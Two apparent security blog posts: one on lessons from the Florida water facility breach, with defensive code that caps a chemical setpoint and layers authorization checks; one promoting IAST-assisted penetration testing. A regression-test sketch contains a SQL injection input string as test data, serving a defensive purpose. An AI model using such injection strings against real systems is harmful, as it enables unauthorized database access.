Investigative journalist Brian Krebs interviewed a number of industrial control systems security experts and discovered that there are approximately 54,000 distinct drinking water systems in the U.S. Nearly all of them rely on some type of remote access to monitor and/or administer these facilities. Additionally, many of these facilities are unattended, underfunded, and do not have 24/7 monitoring of their IT operations. In other words, this type of breach is likely to happen again and, if we don’t take the necessary security considerations into account, the consequences could be devastating.

Industrial control systems and utilities notoriously prioritize operational efficiencies over security. This is a wake-up call for the industry to start looking at their systems from a security and safety perspective. To get started, here are the key lessons I learned from the incident.

Lessons Learned from the Florida Water Facility Breach

Many of the reports written about the breach are centered around remote access. That is not surprising as the security concerns of remote access and host-based security have escalated amid COVID-19. Host-based security represents a large attack surface that is rapidly evolving as employees continue to work disparately.

Think back to March 2020. Organizations needed to get people online fast and began enabling Remote Desktop Protocol (RDP), which is known to be vulnerable. Cyber security firm Kaspersky found that the number of brute force attacks targeting RDP rose sharply after the onset of the coronavirus pandemic. Further, internet indexing service Shodan reported a 41 percent increase in RDP endpoints available on the internet as the virus began to spread. The decision about which type of remote access to give a system should be based on the level of security that system requires.

That being said, in my opinion there is more to learn from this incident beyond the remote access system vulnerabilities.

It is critical to analyze your security program holistically

These systems are complex and require a design-level review to understand what could go wrong rather than completing ad hoc security assessments that look at the technology separately.

For example, say you performed an assessment of your desktop images and are notified that you have TeamViewer installed as a potential risk. This is something that is likely to get written off as a valid use case because it is how the IT team accesses the computer to troubleshoot operational issues remotely. Unless you assess all the systems involved in the environment and how they work together, it can be difficult to understand the risk your organization faces.

This is where threat modeling and design reviews prove vital. According to software security expert Gary McGraw, 50 percent of application security risks come in the form of software design flaws that cannot be identified by automated means. Threat modeling and design reviews leverage human security experts to evaluate your program in its entirety and provide you with an understanding of the current level of security in your software and its infrastructure components. Threat modeling in particular analyzes attack scenarios, identifies system vulnerabilities, and compares your current security activities with industry best practices. And with a design review, you gain clarity on where security controls exist and make strategic decisions on absent or ineffective controls.

Defense in depth is non-negotiable

The software the facility uses to increase the amount of sodium hydroxide should have never been able to reach dangerous levels in the first place. When software is developed, it should be built with security and safety in mind. For example, the maximum threshold should be an amount of sodium hydroxide that is safe, not one that is potentially life-threatening.
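This safety principle can be sketched in a few lines of code. The function name, limits, and units below are illustrative, not real water-treatment parameters; the point is that a setpoint outside a safe range should fail closed in software, no matter who requests it.

```python
# Hypothetical sketch: enforce a safe operating range at the software layer.
# The bounds and ppm values here are illustrative, not real dosing limits.

SAFE_PPM_MIN = 10.0    # illustrative lower bound for a chemical setpoint
SAFE_PPM_MAX = 100.0   # illustrative upper bound; anything above is rejected

def set_dosing_level(requested_ppm: float) -> float:
    """Accept a requested dosing setpoint only if it is within the safe range."""
    if not (SAFE_PPM_MIN <= requested_ppm <= SAFE_PPM_MAX):
        raise ValueError(
            f"Requested level {requested_ppm} ppm is outside the safe range "
            f"[{SAFE_PPM_MIN}, {SAFE_PPM_MAX}]"
        )
    return requested_ppm  # in a real system this would drive the controller

# A normal adjustment succeeds; a dangerous one fails closed.
print(set_dosing_level(50.0))
try:
    # Reports described a spike of this magnitude in the Oldsmar incident.
    set_dosing_level(11100.0)
except ValueError as e:
    print("rejected:", e)
```

With a hard limit like this in place, a compromised remote session or a malicious insider could still tamper with settings, but the software itself refuses to reach a life-threatening level.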

What if it was a disgruntled employee that decided to change the amount of sodium hydroxide? Or if the technology attendant had been bribed? The outcome of the situation would have looked much different.

It’s a best practice in security to create as much segregation as possible between your operational technology (OT), the technology that physically moves things, and your information technology (IT), the technology that stores and manages data, to avoid incidents that could result in physical harm. To achieve this, defense in depth is essential.

Defense in depth is a cyber security approach that layers defensive controls to ensure that, if one control fails, there will be another to prevent a breach. Authentication and access management are protections at the front line of a defense in depth strategy and a critical security pillar for industrial control systems and utilities. For systems or tasks that can have a detrimental impact if breached, add multiple layers of authentication so that not one computer or one individual can carry out the task. Additionally, adopting the concept of Least Privilege, or only allowing employees access to the minimum number of resources needed to accomplish their tasks, would be a good practice to implement industry wide.
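The layered-control idea above can be sketched as a simple gate: a sensitive action proceeds only when every independent control passes. The role names and checks here are illustrative assumptions, not a prescribed control set.

```python
# Hypothetical sketch of defense in depth for a sensitive action: the request
# must pass several independent controls, so no single compromised control
# can authorize the change on its own. Roles and checks are illustrative.
from typing import Optional

def can_change_setpoint(user_role: str, mfa_verified: bool,
                        second_approver: Optional[str]) -> bool:
    checks = [
        user_role == "operator",      # least privilege: only operators may act
        mfa_verified,                 # a second authentication factor
        second_approver is not None,  # two-person rule for critical changes
    ]
    return all(checks)

# All layers pass -> allowed; any single missing layer -> denied.
print(can_change_setpoint("operator", True, "supervisor_b"))  # True
print(can_change_setpoint("operator", True, None))            # False
print(can_change_setpoint("viewer", True, "supervisor_b"))    # False
```

Each check maps to one layer from the paragraph above: least privilege, multi-factor authentication, and multi-person authorization for tasks that could cause physical harm.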

We are not prepared for disaster scenarios

We are reliant on the use of outdated systems that are not prepared for certain disaster scenarios. For an industrial control system to experience downtime, it does not require an adversary to compromise a system. Look at what happened with the Texas winter storm. No one expected the weather to get that bad, but we could have better prepped our systems for it.

That is the challenge with utilities and industrial control systems. If you are not preparing for adversaries in tandem with natural disasters and other unforeseen circumstances, you could have major issues to deal with in the long run.

Another key factor to consider is time. When something goes wrong, coming up with the easiest, least expensive, and most feasible solution isn’t possible because of time constraints. And with water, heat, electricity, energy, or gas companies, the pressure of time is mounting because they are a critical part of our lives. Say the furnace in your home breaks when it is below freezing outside. You typically have two options: have someone come out and evaluate the situation, wait weeks for the part, and fix the existing furnace, or buy a new one and have it installed in days. To avoid frozen pipes and infrastructure issues, most would choose the fastest option. In a recent study, those who did not test their disaster recovery plan cited time and resources as the biggest barriers.

At utility facilities, there remains a lack of awareness around cyber security. Regular tabletop exercises that simulate a crisis scenario are necessary when working with systems this complex.

The three key learnings discussed in this blog should work in concert with one another. Use the findings from your holistic security assessment and dust off your disaster recovery and incident response plans to remediate your biggest security and safety gaps – and, in turn, strengthen your defense in depth.

Back

Introducing Interactive Pentesting: Human Experts Augmented With IAST

In 2008, Brian Chess declared the impending death of application penetration testing. He believed that pentesting, as everyone knew it back then, was in its final days – about to die and come back as something else. He likened it to the ubiquitous personal digital assistants (PDAs) of the early 2000s – disappearing in form, while the key functions were reborn in modern smartphones.

Pentesting Remains Alive and Well

But more than 12 years since Chess predicted the imminent demise of pentesting, it continues to thrive in almost exactly the same form as before. This is because penetration testing examines a target environment as a whole – looking into complex or fundamental vulnerabilities that scan-based tools cannot find, such as business logic flaws, poor separation of duties, or ineffective network segmentation. Pentesting can offer tangible ROI in terms of breach prevention, compliance reporting, and ongoing security metrics.

The objective of pentesting is to simulate attacks on network infrastructure and applications in order to test defenses and find vulnerabilities.

  • Network penetration testing targets network and host configurations to verify patches and other vulnerability checks.
  • Application penetration testing focuses on testing custom applications, such as web applications, application programming interfaces (APIs), and rich-client applications.

With application pentesting in particular, a typical engagement involves a small team that spends a week or two focused on a specific application. Because of the long delays and natural bottlenecks associated with the process, organizations generally save these tests for the end of the software development life cycle (SDLC).

Feeding the Need for DevOps Speed

In the early 2000s, pentesting traditional monolithic web applications was relatively easy. Anyone with a proxy and the OWASP Testing Guide could find a wide range of issues. However, since that “golden age” of pentesting, software development has accelerated dramatically.

An astounding 92.7 billion lines of code were written in 2020 alone. Today’s software applications have become much larger, more complex, more interconnected, and far more critical to the individuals and organizations that use them. The majority (79%) of DevOps teams report that they are under increasing pressure to shorten release cycles – and 80% of teams deploy code to production at least multiple times per week. Indeed, modern development pipelines are designed to deliver software not in days or even hours – but in minutes.

How Can Pentesting Keep Up With Today’s Development Cycles?

1. Start with threat modeling

Traditional pentesting efforts are often poorly prioritized and directed. Rather than focusing on finding the most critical risks, they simply use a checklist or a specific set of tools. For modern applications in particular, threat modeling can help drive testing priorities by identifying key security and privacy concerns. The Threat Modeling Manifesto is a great place to get started.

2. Partner with development

Effective testing requires detailed information about how the application works and the ability to leverage the quality-test infrastructure to generate and modify application traffic. The fastest way for application security to do this is to partner with the development team. Here, pentesters should strive to work with developers to understand an application’s unique complexities without compromising their independence.

3. Stop competing with tools

Pentesting should be part of a “balanced breakfast” of testing techniques. Do not waste precious pentesting hours on things that have already been thoroughly tested with other techniques, such as interactive application security testing (IAST). Focus manual testing efforts on the specific areas where other application security tools are weak, like authentication, access control, and use of encryption. Track your route coverage to make sure you have thoroughly tested all of the application or API attack surface.

4. Embrace continuous testing

DevOps and Agile workflows have been widely embraced to accelerate release cycles and the amount of new code being written. Modern SDLC pipelines often deploy code to production many times each day. There is simply no way to perform traditional penetration tests before release without disrupting workflows and severely slowing down the SDLC. To reduce the time between deployment and testing, organizations must consider more scalable approaches that can run continuously.

5. Adapt to modern application complexity (APIs, microservices, serverless)

Today’s cloud-native applications can be difficult to test. Authentication schemes are complex, and rapid request rates make interception difficult. For example, APIs do not just use HTTP with simple payloads; they also use formats like JSON, XML, and serialized objects. And API security has become particularly important because APIs serve as gateways into an enterprise, making them popular targets for bad actors. Further, modern pentesting requires tools that generate attack traffic across all the distributed parts of the application, and it may take time to understand these communications and gain comprehensive visibility.

6. Understand open-source libraries and frameworks

Similarly, there is complexity on the server side. The vast majority of applications (94%) rely on open-source components, each with an average of nearly 700 dependencies that present potential vulnerabilities. For example, the newly discovered dependency confusion attack can leverage an open-source ecosystem flaw to upload malware to repositories, which then get automatically distributed downstream into internal applications. To address these sorts of issues, a pentesting team must quickly understand the application framework, how it routes to code, and how built-in security defenses are supposed to work.

7. Leverage instrumentation

Organizations can dramatically accelerate penetration testing by getting visibility into exactly what happens inside the application code or API when an attack is sent. Security instrumentation tools (like IAST) are very effective at tracking things like data flows, control flows, backend connections, and configuration files. Application security teams should install an agent before starting pentesting, which can then provide an inside view of all actual vulnerabilities present in the code during the application runtime. This visibility can dramatically accelerate penetration testing coverage and accuracy.

8. Deliver security test cases

Communicating with development teams and other groups that need to know about security is tough. Rather than delivering a traditional PDF report with arcane findings, application security teams should consider using Jira tickets to make their recommendations easier to consume. Even better, application security teams can deliver findings as test cases that run continuously with every build to prevent future instances of each discovered vulnerability from ever reoccurring. Security that natively integrates with ticketing systems can have an even broader impact – helping to improve the accuracy of testing, incentivize the remediation, and accelerate development cycles – all while helping to deliver secure code to production.
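Delivering a finding as a regression test can be sketched as follows. The `handle_search` stand-in and its payload check are hypothetical, assumed only for illustration; a real security test case would exercise the actual application endpoint on every build.

```python
# Hypothetical sketch: a pentest finding delivered as a regression test that
# runs with every build. handle_search is a stand-in for the application;
# in practice the tests would call the real endpoint that was found vulnerable.

def handle_search(term: str) -> int:
    """Stand-in for the application: returns an HTTP-style status code.
    The fix under test rejects input containing SQL metacharacters."""
    if "'" in term or ";" in term:
        return 400  # bad request: payload rejected
    return 200      # normal input handled

def test_search_rejects_sql_injection():
    # The original finding: this payload previously reached the database.
    assert handle_search("' OR '1'='1") == 400

def test_search_allows_normal_input():
    # Guard against an over-broad fix that breaks legitimate searches.
    assert handle_search("pentest report") == 200

test_search_rejects_sql_injection()
test_search_allows_normal_input()
print("both security regression tests passed")
```

Packaged this way, the finding keeps protecting the codebase long after the engagement ends: if the vulnerability is ever reintroduced, the build fails.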

The Evolution of Penetration Testing

Ideally, the goal of modern pentesting should be to figure out new application technologies and how to test them for vulnerabilities. Penetration testing teams should be the advance guard for the SDLC – driving the state of the art in security forward. But there simply are not enough skilled application security researchers to perform penetration testing on everything. So, we must continuously take the manual test approaches designed by penetration testers and support them with automation.

That said, unlike premature prognostications a decade ago, penetration testing is not on its deathbed. In one form or another, it will always be a valuable part of application security. And as applications continue to expand and grow more complex, security must evolve pentesting for each new layer that is added.

For more details on next-generation pentesting, make sure to register for the upcoming webinar – “How to Streamline AppSec with Interactive Pentesting.”
